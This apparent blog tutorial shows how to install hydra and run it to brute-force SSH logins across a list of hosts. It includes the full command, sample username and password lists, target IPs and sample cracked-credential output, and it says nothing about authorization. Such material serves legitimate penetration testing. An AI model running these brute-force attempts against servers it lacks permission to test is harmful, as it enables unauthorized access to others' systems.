How to use hydra to test/crack ssh credentials for a list of servers

To install hydra on Ubuntu:

sudo apt install hydra

Simply, to start our test/attack, we have a list of usernames, list of passwords and list of servers:

hydra -L users.txt -P passes.txt -u -M hosts.txt ssh -o Report.txt

Where:

users.txt is the file containing the user names, one per line, e.g.

root
user1
user2
user3

passes.txt is the list of passwords, one per line as well, e.g.

expectedpass1
expectedpass2
expectedpass3

hosts.txt is the list of IPs to test/attack, one per line, e.g.

192.168.100.20
192.168.20.24
10.165.34.56

Report.txt is the file containing the list of servers that could be cracked using values of users/passes/hosts from the files we provided, e.g.

[22][ssh] host: 192.168.100.21   login: root   password: expectedpass1
 [22][ssh] host: 192.168.100.22   login: user1   password: expectedpass2
 [22][ssh] host: 192.168.100.23   login: user2  password: expectedpass3

That’s it, Enjoy!

Sources: Mainly the hydra man page and some online forums

About SoCRaT

Systems Engineer, OSS & Linux Geek

View all posts by SoCRaT →

This entry was posted in Linux and tagged Crack, hydra, ssh, Ubuntu. Bookmark the permalink.

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Twitter account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s